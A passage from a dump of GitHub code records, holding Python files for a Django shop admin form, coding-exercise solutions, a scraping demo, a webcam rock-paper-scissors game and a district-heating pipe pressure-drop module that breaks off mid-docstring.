str(a.pk) + \"&redirect=/admin/reservations/edit\"\n if request.GET.get(\"srid\"):\n f.action_url += '&srid=' + str(request.GET[\"srid\"])\n f.add(PlainText(\"Price: \" + render_price(a.price) + \"<br />\"))\n f.add_content(PlainText(\"Specify amount: \"))\n f.add_content(NumberField(name=\"quantity\", minimum=1, maximum=get_article_pcs_free(a),\n button_text=\"1\"))\n f.add_content(PlainText(\"Maybe add some optional notes:\"))\n f.add_content(TextArea(name=\"notes\", label_text=\"Notes:\", text=\"\"))\n f.add_content(PlainText(\"<br />\"))\n else:\n grp = a.group\n f.action_url = \"/admin/actions/add-article-to-reservation?group_id=\" + str(grp.pk) + \\\n \"&redirect=/admin/reservations/edit&rid=\" + str(int(request.GET[\"rid\"]))\n if request.GET.get(\"srid\"):\n f.action_url += '&srid=' + str(request.GET[\"srid\"])\n sizes, types, sizesdict = get_article_dict(grp)\n f.add(PlainText(\"<table><thead><tr><th> Version </th>\"))\n for s in sizes:\n f.add(PlainText(\"<th>\" + str(s) + \"</th>\"))\n f.add(PlainText(\"</tr></thead><tbody>\"))\n for t in types:\n f.add(PlainText(\"<tr><td>\" + get_type_string(t) + \"</td>\"))\n for s in sizes:\n f.add(PlainText(\"<td>\"))\n if sizesdict[s].get(t):\n quantity, price, aid, description, visible = sizesdict[s][t]\n if not visible:\n f.add(PlainText(\"Currently not avaiable\"))\n pcsfree = get_article_pcs_free(Article.objects.get(pk=aid))\n if visible and pcsfree > 0:\n f.add(PlainText(\"Price: \" + render_price(price) + \"<br />\"))\n f.add_content(PlainText(\"Specify amount: \"))\n f.add_content(NumberField(name=\"quantity_\" + str(aid), minimum=0, \n maximum=pcsfree, button_text=\"0\"))\n f.add_content(PlainText(\"Maybe add some optional notes:\"))\n f.add_content(TextArea(name=\"notes_\" + str(aid), label_text=\"Notes:\", text=\"\"))\n else:\n f.add(PlainText(\"Unfortunately this article is already sold out.\"))\n else:\n f.add(PlainText(\"Currently not avaiable\"))\n f.add(PlainText(\"</td>\"))\n f.add(PlainText(\"</tr>\"))\n f.add(PlainText(\"</tbody></table><br />\"))\n f.add_content(SubmitButton())\n a = render_headbar(request, title=\"Specify article details\")\n a += '<div class=\"\"><div class=\"w3-row w3-padding-64 w3-twothird w3-container\">' \\\n '<h3>Please specify further details:</h3>'\n a += f.render_html(request)\n a += '</div></div>' + render_footer(request)\n return HttpResponse(a)\n except Exception as e:\n return redirect(\"/admin/?error=\" + str(e))\n","repo_name":"Technikradio/C3FOCSite","sub_path":"c3shop/frontpage/management/articletools/article_select.py","file_name":"article_select.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"293953686","text":"import sys\nfrom datetime import datetime\n\ndef validate_date(date_str):\n try:\n date = datetime.strptime(date_str, \"%Y%m%d\")\n return date >= datetime(1600, 1, 1)\n except ValueError:\n return False\n\ndef main():\n dates = []\n for line in sys.stdin:\n if validate_date(line):\n dates.append(datetime.strptime(line, \"%Y%m%d\"))\n legal_dates = sorted(dates)\n\n if len(legal_dates) < 2:\n print(-1)\n return \n min_difference = (legal_dates[1] - legal_dates[0]).days\n\n for i in range(2, len(legal_dates)):\n difference = (legal_dates[i] - legal_dates[i - 1]).days\n min_difference = min(min_difference, difference)\n\n print(min_difference)\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"manekiyong/coding_workshop","sub_path":"exercise_q1_closest_dates.py","file_name":"exercise_q1_closest_dates.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7953699097","text":"from django.db import models\nimport uuid\nfrom django.db.models.signals import post_init\nfrom django.dispatch import receiver\n\n\nclass APIKey(models.Model):\n app = models.CharField(max_length=64)\n key = models.CharField(max_length=64)\n\n def __unicode__(self):\n return self.app\n\n def generate_key(self, app):\n self.app = app\n self.key = str(uuid.uuid4())\n\n\n@receiver(post_init, sender=APIKey)\ndef APIKey_post_init(sender, instance, **kwargs):\n if not instance.pk and len(instance.key) == 0:\n instance.generate_key(\"\")\n","repo_name":"node13h/IPhistdb-API","sub_path":"apiv1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11396826463","text":"'''\n# Pool 클래스로 웹 스크래핑\n\n# 멀티 프로세싱을 위한 웹 스크래핑 \n# 멀티 프로세싱 x\n# https://beomi.github.io/beomi.github.io_old/ 사이트에 컨텐츠를 scraping\n'''\nimport requests # 특정 사이트의 웹 문서를 읽기 위한 모듈 로딩\nfrom bs4 import BeautifulSoup as bs # 읽어 온 웹 문서를 처리하기 위한 모듈 로딩\nimport time # 지연시간\n\nfrom multiprocessing import Pool\n\ndef get_link(): # 제목 atag 읽기, 특정 사이트와 연결을 위해 링크된 a 태그의 URL을 가져오기 위한 함수\n data = requests.get(\"https://beomi.github.io/beomi.github.io_old/\").text\n soup = bs(data, 'html.parser')\n my_titles = soup.select('h3 > a')\n\n data = []\n \n for title in my_titles:\n data.append(title.get('href'))\n \n return data\n\ndef get_content(link): # get_link 함수에서 전달 받은 url로 접속해 제목 읽기 함수\n # print(link)\n abs_link = 'https://beomi.github.io' + link\n #print(abs_link)\n data = requests.get(abs_link).text\n soup = bs(data, 'html.parser') # 가져온 데이터로 처리 작업 (그러나 여기에서는 그저 처리 소요 시간이 궁금)\n # 가져온 데이터로 뭔가를 할 수 있다. ...\n print(soup.select('h1')[0].text) # 첫번째 h1 태그의 텍스트 하나만 출력\n \nif __name__ == '__main__':\n startTime = time.time()\n \n # 1) 멀티 프로세싱 x -> 1.4\n # print(get_link()) # 출력\n # print(len(get_link())) # 26(총 몇개를 가져왔는지)\n for link in get_link():\n get_content(link)\n \n # 2) 멀티 프로세싱 o, 병렬처리 -> 0.9\n# pool = Pool(processes = 4) # 4개의 프로세스 사용\n# pool.map(get_content, get_link()) # 링크의 갯수만큼 컨텐츠를 받는다, 함수와 인자값을 매핑하면서 처리\n \n print('---%s 초 ---'%(time.time() - startTime)) # 멀티 프로세싱x, 멀티 프로세싱o 시간 비교해보기~\n\n\n\n","repo_name":"shinbumjun/Python","sub_path":"pypro1/pack6network/test50pool_scraping.py","file_name":"test50pool_scraping.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37271465629","text":"\"\"\"Arrays\n\nhttps://www.hackerrank.com/challenges/np-arrays/problem?isFullScreen=false\n\nTask\n\nYou are given a space separated list of numbers.\nYour task is to print a reversed NumPy array with the element type float.\"\"\"\n\n\nimport numpy\n\n\ndef arrays(arra):\n arr = numpy.array(arra, float)\n return numpy.flip(arr)\n\n\nar = input().strip().split(' ')\nresult = arrays(ar)\nprint(result)\n","repo_name":"BrunoBaia/Hackerrank","sub_path":"99.py","file_name":"99.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1944325092","text":"from collections import defaultdict\n\ndef neighbor(pattern, mismatch, candidate_kmers):\n bases = ['A', 'T', 'G', 'C']\n for i in range(len(pattern)):\n for j in range(len(bases)):\n new_kmer = pattern[:i] + bases[j] + pattern[i+1:]\n if (mismatch <= 1):\n candidate_kmers.add(new_kmer)\n else:\n neighbor(new_kmer, mismatch-1, candidate_kmers)\n\ndna = \"ACGTTGCATGTCGCATGATGCATGAGAGCT\"\nk, d = 4, 1\nn = len(dna)\nans = defaultdict(int)\n\nfor i in range(n-k+1):\n candidate_kmers = set()\n sub = dna[i:i+k]\n neighbor(sub, d, candidate_kmers)\n\n for kmer in candidate_kmers:\n ans[kmer] += 1\n\nmx = max(ans.values())\nfor k in ans:\n if mx == ans[k]:\n print(k, end=\" \")\n","repo_name":"Jak57/bio-informatics-lab","sub_path":"BA1I.py","file_name":"BA1I.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"40929195822","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n t_count = Counter(t)\n window = defaultdict(int)\n left = 0\n count = 0\n res = \"\"\n\n for right in range(len(s)):\n\n if s[right] in t_count:\n window[s[right]] += 1\n\n if t_count[s[right]] == window[s[right]]:\n count += 1\n\n while count == len(t_count):\n if not res or (right - left + 1) < len(res):\n res = s[left:right + 1]\n if s[left] in t_count:\n window[s[left]] -= 1\n\n if window[s[left]] < t_count[s[left]]:\n count -= 1\n if window[s[left]] == 0:\n del window[s[left]]\n left += 1\n\n return \"\".join(list(res))","repo_name":"yordi68/Competitive_Programming","sub_path":"minimum-window-substring.py","file_name":"minimum-window-substring.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7900638841","text":"# +3\n\nfrom itertools import permutations\ndef operations(num1, num2, s):\n # 문자로 들어오기 때문에 int처리 해야됨\n if s == '+':\n return str(int(num1) + int(num2))\n if s == '-':\n return str(int(num1) - int(num2))\n if s == '*':\n return str(int(num1) * int(num2))\n\ndef calculate(exp, sign):\n # 주어진 식의 수식과 숫자를 문자로 array에 저장\n array = []\n temp = ''\n for i in exp:\n # 숫자면 temp에 한번에 저장하려구\n if i.isdigit():\n temp += i\n else:\n array.append(temp)\n array.append(i)\n temp = ''\n array.append(temp)\n # 혹시나 남아있을 숫자도 array에 저장\n\n # 계산\n # 계산을 위해 sign 우선순위에 들어간다면 operation 수행,\n # 그렇지 않다면 stack에 차곡 차곡 쌓아두기\n for i in sign:\n stack = []\n while len(array) != 0:\n temp = array.pop(0)\n # 수식 우선순위에 해당된다면\n # 그 전 숫자와 그 다음 숫자 뽑아서 계산돌릴거야\n if temp == i:\n stack.append(operations(stack.pop(), array.pop(0), i))\n # 그렇지 않으면 얌전히 stack에 저장시켜놔\n else:\n stack.append(temp)\n array = stack\n return abs(int(array[0]))\n\ndef solution(expression):\n signs = list(permutations(['+', '-', '*'], 3))\n answer = []\n for sign in signs:\n answer.append(calculate(expression, sign))\n return answer\n\n\nexpression = \"100-200*300-500+20\"\n# expression =\"50*6-3*2\"\nprint(solution(expression))","repo_name":"GayeonKimm/CT","sub_path":"Programmers/2_level/수식 최대화.py","file_name":"수식 최대화.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1387543448","text":"import configparser\r\nimport os\r\n\r\nCONFIG = \"config.ini\"\r\n\r\nif __name__ == \"__main__\":\r\n config = configparser.ConfigParser()\r\n config.add_section(\"options\")\r\n config.set(\"options\", \"User_Table\", \"User.db\")\r\n config.set(\"options\", \"Transaction_Table\", \"Transaction.db\")\r\n config.set(\"options\", \"Session_file\", \"session.txt\")\r\n\r\n if os.path.exists(CONFIG):\r\n os.remove(CONFIG)\r\n\r\n with open(CONFIG, 'w') as example:\r\n config.write(example)\r\n","repo_name":"PaulCalderon/ATM-Machine","sub_path":"configmaker.py","file_name":"configmaker.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20876883972","text":"import cv2\nfrom keras.models import load_model\nimport numpy as np\nimport time\nimport random\nfrom camera_input import get_prediction\n\ncomputer_wins = 0\nuser_wins = 0\n\n\ndef get_computer_choice():\n computer_choice = random.choice(['Rock', 'Paper', 'Scissors'])\n return computer_choice\n\n\ndef get_winner(computer_choice, user_choice):\n global computer_wins, user_wins\n if computer_choice == 'Rock' and user_choice == 'Paper':\n print('You won! Paper beats Rock.')\n user_wins += 1\n elif computer_choice == 'Rock' and user_choice == 'Scissors':\n print('You lose. Rock beats Scissors.')\n computer_wins += 1\n elif computer_choice == 'Paper' and user_choice == 'Rock':\n print('You lose. Paper beats Rock')\n computer_wins += 1\n elif computer_choice == 'Paper' and user_choice == 'Scissors':\n print('You won! Scissors beats Paper.')\n user_wins += 1\n elif computer_choice == 'Scissors' and user_choice == 'Rock':\n print('You won! Rock beats Scissors.')\n user_wins += 1\n elif computer_choice == 'Scissors' and user_choice == 'Paper':\n print('You lose. Scissors beats Paper.')\n computer_wins += 1\n elif computer_choice == user_choice:\n print('Draw.')\n else:\n print('Sorry, you did not enter a valid choice.')\n\n\nwhile computer_wins < 3 and user_wins < 3: \n prediction = get_prediction()\n computer_choice = get_computer_choice()\n choice_probability = {'Rock': prediction[0,0], 'Paper': prediction[0,1], 'Scissors': prediction[0,2]}\n user_prediction = max(choice_probability, key=choice_probability.get)\n\n print(f'\\nComputer went with {computer_choice}.')\n print(f'You went with {user_prediction}.')\n game_result = get_winner(computer_choice, user_prediction)\n print(f'\\nSCORE: You: {user_wins} vs. {computer_wins} Computer\\n')\n time.sleep(1)\n if computer_wins == 3:\n print(f'Computer has reach 3 wins. You have lost the game.\\n')\n break\n elif user_wins == 3:\n print(f'You have reach 3 wins. Congratulations, you have won the game!\\n')\n break\n\n","repo_name":"asadiceccarelli/Computer-Vision-RPS","sub_path":"camera_rps.py","file_name":"camera_rps.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73828411347","text":"import logging\nimport math\n\nimport numpy as np\nfrom scipy.optimize import fsolve\n\ntry:\n from CoolProp.CoolProp import PropsSI\n\nexcept ImportError:\n print(\"Need to install CoolProp to use the hydraulic \"\n \"pre-calculation module.\")\n\nlogger = logging.getLogger(__name__) # Create a logger for this module\n\n\ndef eq_smooth(x, R_e):\n r\"\"\"\n Calculation of the pressure drop of hydraulic smooth surfaces.\n (Prandtl & Karman)\n\n .. eq_smooth_equation:\n\n :math:`f(x) = x-2 \\cdot log\\Big(\\frac{Re}{2,51x}\\Big)`\n\n Parameters\n ----------\n x: numeric\n :math:`x`: function variable [-]\n R_e: numeric\n :math:`Re`: Reynolds number [-]\n\n Returns\n -------\n Equation : numeric\n\n \"\"\"\n return x - 2 * np.log10(R_e / (x * 2.51))\n\n\ndef eq_transition(x, R_e, k, d_i):\n r\"\"\"\n Equation to be solved for the transition range\n between a smooth and rough pipe surface (Prandtl-Colebrook)\n\n .. eq_transition_equation\n\n :math:`f(x)=x+2\\cdot log \\big( \\frac{2,51x}{Re} \\cdot \\frac{k}{3,71d_i} \\big)`\n\n Parameters\n ----------\n x : numeric\n :math:`x`: function variable () [-]\n\n R_e: numeric\n :math:`Re`: Reynolds number [-]\n\n k : numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n d_i : numeric\n :math:`d_i`: inner diameter [m]\n\n Returns\n -------\n Equation : numeric\n\n \"\"\"\n\n return x + 2 * np.log10((2.51 * x) / R_e + k / (3.71 * d_i))\n\n\ndef calc_k_v(d_v, d):\n r\"\"\"\n Calcutlates the kinematic viscosity for given density and dynamic viscosity\n\n .. calc_k_v_equation:\n\n :math:`\\nu = \\frac{\\eta}{\\rho}`\n\n Parameters\n ----------\n d_v: numeric\n :math:`\\eta`: dynamic viskosity [kg/(m*s)]\n\n d: numeric\n :math:`\\rho`: density [kg/m³]\n\n Returns\n -------\n kinematic viscosity [m²/s] : numeric\n\n \"\"\"\n return d_v / d\n\n\ndef calc_Re(v, d_i, k_v):\n r\"\"\"\n Calculates the Reynolds number for a given velocity, inner diameter\n and kinematic viscosity\n\n .. calc_Re_equation:\n\n :math:`\\frac{v \\cdot d_i}{\\nu}`\n\n Parameters\n ----------\n v: numeric\n :math:`v`: flow velocity [m/s]\n\n d_i: numeric\n :math:`d_i`: inner pipe diameter [m]\n\n k_v: numeric\n :math:`\\nu`: kinematic viscosity [m²/s]\n\n Returns\n -------\n Reynolds number [-]: numeric\n\n \"\"\"\n return v * d_i / k_v\n\n\ndef calc_lambda_laminar(Re):\n r\"\"\"\n Calculates the Darcy friction factor for a given Reynolds number\n for a laminar flow\n\n .. calc_lam_lam_equation:\n\n :math:`\\lambda=\\frac{64}{Re}`\n\n Parameters\n ----------\n Re: numeric\n :math:`Re`: Reynolds number [-]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n return 64 / Re\n\n\ndef calc_d_p(lam, length, d_i, d, v):\n r\"\"\"\n Calculates the pressure drop in a pipe for a given Darcy friction factor\n\n .. calc_d_p_equation:\n\n :math:`\\Delta p = \\lambda \\frac{l}{d_i} \\frac{\\rho}{2} v^2`\n\n Parameters\n ----------\n lam: numeric\n :math:`\\lambda`: Darcy friction factor [-]\n\n length: numeric\n :math:`l`: length of the pipe [m]\n\n d_i : numeric\n :math:`d_i`: inner pipe diameter [m]\n\n d: numeric\n :math:`\\rho`: density [kg/m³]\n\n v: numeric\n :math:`v`: flow velocity [m/s]\n\n Returns\n -------\n Pressure drop [Pa]: numeric\n \"\"\"\n return lam * length / d_i * d / 2 * v ** 2\n\n\ndef calc_lambda_turb1(Re):\n r\"\"\"\n Calculates the Darcy friction factor for a given Reynolds number\n for a turbulent flow, a smooth pipe and a Reynolds number smaller\n than 10^5 (Blasius)\n\n .. calc_lam_turb1_equation\n\n :math:`\\lambda = 0,3164\\cdot Re ^{-0,25}`\n\n Parameters\n ----------\n Re: numeric\n :math:`Re`: Reynolds number [-]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n return 0.3164 * Re ** (-0.25)\n\n\ndef calc_lambda_turb2(Re):\n r\"\"\"\n Calculates the Darcy friction factor for a given Reynolds number\n for a turbulent flow, a smooth pipe and a Reynolds number\n between 10^5 and 10^6 (Nikuradse)\n\n .. calc_lam_turb1_equation\n\n :math:`\\lambda = 0,0032 + 0,221 \\cdot Re ^{-0,237}`\n\n Parameters\n ----------\n Re: numeric\n :math:`Re`: Reynolds number [-]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n return 0.0032 + 0.221 * Re ** (-0.237)\n\n\ndef calc_lambda_turb3(Re):\n r\"\"\"\n Calculates the Darcy friction factor for a given Reynolds number\n for a turbulent flow, a smooth pipe and a Reynolds number higher than 10^6.\n For a formula, see :func:`~precalc_hydraulic.eq_smooth`.\n\n Parameters\n ----------\n Re: numeric\n :math:`Re`: Reynolds number [-]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n lam_init = 0.3164 / (Re ** 0.25)\n\n x = fsolve(eq_smooth, x0=lam_init, args=Re)\n\n return 1 / x[0] ** 2\n\n\ndef calc_lambda_rough(d_i, k):\n r\"\"\"\n Calculates the Darcy friction factor for a turbulent flow\n and a rough inner pipe surface (Prandtl & Nikuradse)\n\n .. calc_lam_rough_equation\n\n :math:`\\lambda =\\frac{1}{(2 log(3,71\\frac{d_i}{k}))^2}`\n\n Parameters\n ----------\n d_i : numeric\n :math:`d_i`: inner pipe diameter [m]\n\n k : numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n return 1 / ((-2 * np.log10(k / (3.71 * d_i))) ** 2)\n\n\ndef calc_lambda_transition(R_e, k, d_i):\n r\"\"\"\n Calculates the Darcy friction factor for a given Reynolds number\n for a turbulent flow and the transition area between a rough and\n smooth pipe surface.\n\n See also :func:`~precalc_hydraulic.eq_transition`.\n\n Parameters\n ----------\n R_e: numeric\n :math:`Re`: Reynolds number [-]\n\n k : numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n d_i : numeric\n :math:`d_i`: inner pipe diameter [m]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n lam_init = 0.25 / R_e ** 0.2\n x = fsolve(eq_transition, x0=lam_init, args=(R_e, k, d_i))\n return 1 / x[0] ** 2\n\n\ndef delta_p(v, d_i, k=0.1, T_medium=90, length=1,\n pressure=101325, R_crit=2320, fluid='IF97::Water'):\n\n r\"\"\"\n Function to calculate the pressure loss in a pipeline\n\n Parameters\n ----------\n v : numeric\n :math:`v`: flow velocity [m/s]\n\n d_i : numeric\n :math:`d_i`: inner pipe diameter [m]\n\n k : numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n T_medium : numeric\n :math:`T_{medium}`: fluid temperature [°C]\n\n length : numeric\n :math:`l`: length of the pipe [m]\n\n pressure : numeric\n :math:`p`: pressure in the pipe [Pa]\n\n R_crit : numeric\n :math:`Re_{crit}`: critical Reynolds number between laminar and turbulent flow [-]\n\n fluid : str\n name of the fluid used\n\n Returns\n -------\n Pressure drop [bar] : numeric\n\n \"\"\"\n k = k * 0.001\n\n # get density of water [kg/m^3]\n d = PropsSI('D', 'T', T_medium + 273.15, 'P', pressure, fluid)\n # dynamic viscosity eta [kg/(m*s)]\n d_v = PropsSI('V', 'T', T_medium + 273.15, 'P', pressure, fluid)\n k_v = calc_k_v(d_v, d)\n\n # Reynolds number\n R_e = calc_Re(v, d_i, k_v)\n\n if R_e < R_crit: # laminar flow\n lam = calc_lambda_laminar(R_e)\n d_p = calc_d_p(lam, length, d_i, d, v)\n\n else: # turbulent flow\n\n if R_e * k / d_i < 65:\n # Smooth pipe\n\n if R_e < 10**5:\n lam = calc_lambda_turb1(R_e)\n\n elif R_e >= 10**5 and R_e < 10**6:\n lam = calc_lambda_turb2(R_e)\n\n else:\n # Re > 10^6\n lam = calc_lambda_turb3(R_e)\n\n elif R_e * k / d_i > 1300:\n # Rough pipe\n lam = calc_lambda_rough(d_i, k)\n\n else:\n # Transition range 65 < Re * k/d < 1300\n lam = calc_lambda_transition(R_e, k, d_i)\n\n d_p = calc_d_p(lam, length, d_i, d, v)\n\n return d_p\n\n\ndef calc_v(vol_flow, d_i):\n r\"\"\"\n Calculates the velocity for a given volume flow and inner diameter of a pipe.\n\n .. calc_v_equation:\n\n :math:`v_{flow}=\\frac{\\dot{V}}{(\\frac{d_i}{2})^2*\\pi}`\n\n Parameters\n ----------\n vol_flow: numeric\n :math:`\\dot{V}`: volume flow [m³/h]\n\n d_i: numeric\n :math:`d_i`: inner diameter [m]\n\n Returns\n -------\n flow velocity [m/s] : numeric\n\n \"\"\"\n return vol_flow / ((d_i * 0.5)**2 * math.pi * 3600)\n\n\ndef v_max_secant(d_i, T_average, k=0.1, p_max=100, p_epsilon=1,\n v_0=1, v_1=2,\n pressure=101325, fluid='IF97::Water'):\n r\"\"\"Calculates the maximum velocity via iterative approach\n using the secant method.\n\n The two different starting values v_0 and v_1 should be in the\n area of the maximum flow velocity, as iteration starts from there.\n\n Parameters\n ----------\n d_i: numeric\n :math:`d_i`: inner diameter [m]\n\n T_average: numeric\n :math:`T_{av}`: average temperature [°C]\n\n k: numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n p_max: numeric\n :math:`p_{max}`: maximum pressure drop in pipeline [Pa]\n\n p_epsilon: numeric\n :math:`p_\\epsilon`: accuracy of pressure [Pa]\n\n v_0: numeric\n :math:`v_0`: first value of initial guess for maximum flow velocity [m/s]\n\n v_1: numeric\n :math:`v_1`: second value of initial guess for maximum flow velocity [m/s]\n\n pressure: numeric\n :math:`p`: pressure level [pa]\n\n fluid: str\n type of fluid, default: 'IF97::Water'\n\n Returns\n -------\n maximum flow velocity [m/s] : numeric\n\n \"\"\"\n p_new = 0\n v_new = 0\n n = 0\n while n < 100:\n n += 1\n\n p_0 = delta_p(v_0, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n p_1 = delta_p(v_1, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n v_new = v_1 - (p_1 - p_max) * (v_1 - v_0) / (p_1 - p_0)\n\n p_new = delta_p(v_new, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n if abs(p_new - p_max) < p_epsilon:\n break\n\n else:\n v_0 = v_1\n v_1 = v_new\n\n logger.info(\n \"Maximum flow velocity calculated. Iterations: %d, \"\n \"Flow velocity: %.4f [m/s], Pressure drop: %.4f [Pa/m]\"\n % (n, v_new, p_new)\n )\n\n return v_new\n\n\ndef v_max_bisection(d_i, T_average, k=0.1, p_max=100,\n p_epsilon=0.1, v_epsilon=0.001,\n v_0=0.01, v_1=10,\n pressure=101325, fluid='IF97::Water'):\n r\"\"\"Calculates the maximum velocity via bisection for a given pressure drop.\n\n The two starting values `v_0` and `v_1` need to be given,\n with `v_0` below the expected flow velocity and `v_1` above.\n These are the starting values for the bi-section method.\n\n If either of the stop-criteria `p_epsilon` or `v_epsilon` is reached,\n the iterative calculation is stopped.\n\n Parameters\n ----------\n d_i: numeric\n :math:`d_i`: inner diameter [m]\n\n T_average: numeric\n :math:`T_{av}`: average temperature [°C]\n\n k: numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n p_max: numeric\n :math:`p_{max}`: maximum pressure drop in pipeline [Pa]\n\n p_epsilon: numeric\n :math:`p_\\epsilon`: accuracy of pressure [Pa]\n\n v_epsilon: numeric\n :math:`v_\\epsilon`: accuracy of velocity [m/s]\n\n v_0 : numeric\n :math:`v_0`: first value of initial guess for maximum flow velocity [m/s]\n\n v_1: numeric\n :math:`v_1`: second value of initial guess for maximum flow velocity [m/s]\n\n pressure: numeric\n :math:`p`: pressure level [Pa]\n\n fluid: str\n type of fluid, default: 'IF97::Water'\n\n Returns\n -------\n maximum flow velocity [m/s] : numeric\n\n \"\"\"\n p_0 = delta_p(v_0, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n p_1 = delta_p(v_1, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n if (p_0 - p_max) * (p_1 - p_max) >= 0:\n raise AttributeError(\n \"The initial guesses `v_0` and `v_1` must be \"\n \"below and above the expected flow velocity.\"\n )\n\n p_new = 0\n v_new = 0\n n = 0\n while n < 200:\n n += 1\n\n p_0 = delta_p(v_0, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n p_1 = delta_p(v_1, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n v_new = 0.5 * (v_1 + v_0)\n\n p_new = delta_p(v_new, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n if abs(p_new - p_max) < p_epsilon:\n logger.info(\"Bi-section method: p_epsilon criterion reached.\")\n break\n\n if abs(v_1 - v_0) < v_epsilon: # wieso v_1 und v_0?\n logger.info(\"Bi-section method: v_epsilon criterion reached.\")\n break\n\n else:\n # no stop criteria reached\n # check if p_new is above or below p_max\n if (p_0 - p_max) * (p_new - p_max) < 0:\n v_1 = v_new\n else:\n v_0 = v_new\n\n logger.info(\n \"Maximum flow velocity calculated. Iterations: %d, \"\n \"Flow velocity: %.4f [m/s], Pressure drop: %.4f [Pa/m]\"\n % (n, v_new, p_new)\n )\n\n return v_new\n\n\ndef calc_power(T_vl=80, T_rl=50, mf=3, p=101325):\n r\"\"\"\n Function to calculate the thermal power based on mass flow and temperature difference.\n\n .. calc_power_equation:\n\n :math:`P_{th} = \\dot{m} \\cdot (c_{p_{VL}} \\cdot T_{VL} - c_{p_{RL}} \\cdot T_{RL})`\n\n Parameters\n ----------\n T_vl: numeric\n :math:`T_{VL}`: forward temperature [°C]\n\n T_rl: numeric\n :math:`T_{RL}`: return temperature [C°]\n\n mf: numeric\n :math:`\\dot{m}`: mass flow [kg/s]\n\n p: numeric\n :math:`p`: pressure [Pa]\n\n Returns\n -------\n thermal power [W] : numeric\n\n \"\"\"\n cp_vl = PropsSI('C', 'T', T_vl + 273.15, 'P', p, 'IF97::Water')\n\n cp_rl = PropsSI('C', 'T', T_rl + 273.15, 'P', p, 'IF97::Water')\n\n return mf * (cp_vl * (T_vl + 273.15) - cp_rl * (T_rl + 273.15))\n\n\ndef calc_mass_flow(v, di, T_av, p=101325):\n r\"\"\"\n Calculates the mass flow in a pipe for a given density, diameter and flow velocity.\n The average temperature is needed for a correct value of the density.\n\n .. calc_mass_flow_equation:\n\n :math:`\\dot{m} = \\pi \\rho_{T_av} v \\big( \\frac{d_i}{2} \\big) ^2`\n\n Parameters\n ----------\n v : numeric\n :math:`v`: flow velocity [m/s]\n\n di : numeric\n :math:`d_i`: inner diameter [m]\n\n T_av : numeric\n :math:`T_av`: temperature level [°C]\n\n p: numeric\n :math:`p`: pressure [Pa]\n\n Returns\n -------\n mass flow [kg/s] : numeric\n\n \"\"\"\n rho = PropsSI('D', 'T', T_av + 273.15, 'P', p, 'IF97::Water')\n\n return rho * v * (0.5 * di) ** 2 * math.pi\n\n\ndef calc_mass_flow_P(P, T_av, delta_T, p=101325):\n r\"\"\"\n Calculates the mass flow in a pipe for a given power and heat difference.\n The average temperature is needed for a correct value of the heat capacity.\n\n .. calc_mass_flow_P_equation:\n\n :math:`\\dot{m} = \\frac{P}{c_{P_{T_{av}}} \\cdot \\Delta T}`\n\n Parameters\n ----------\n P : numeric\n :math:`P`: power [W]\n\n T_av : numeric\n :math:`T_{av}`: average temperature [°C]\n\n delta_T : numeric\n :math:`\\Delta T`: temperature difference [K]\n\n p: numeric\n :math:`p`: pressure [Pa]\n\n Returns\n -------\n mass flow [kg/s]: numeric\n\n \"\"\"\n cp = PropsSI('C', 'T', T_av + 273.15, 'P', p, 'IF97::Water')\n\n return P / (cp * delta_T)\n\n\ndef calc_v_mf(mf, di, T_av, p=101325):\n r\"\"\"\n Calculates the flow velocity for a given mass flow and inner diameter.\n The average temperature is needed for a correct value of the density.\n\n .. calc_v_mf_equation:\n\n :math:`v = \\frac{\\dot{m}}{\\pi \\rho \\cdot \\big( \\frac{d_i}{2} \\big)^2 }`\n\n Parameters\n ----------\n mf : numeric\n :math:`dot{m}`: mass flow 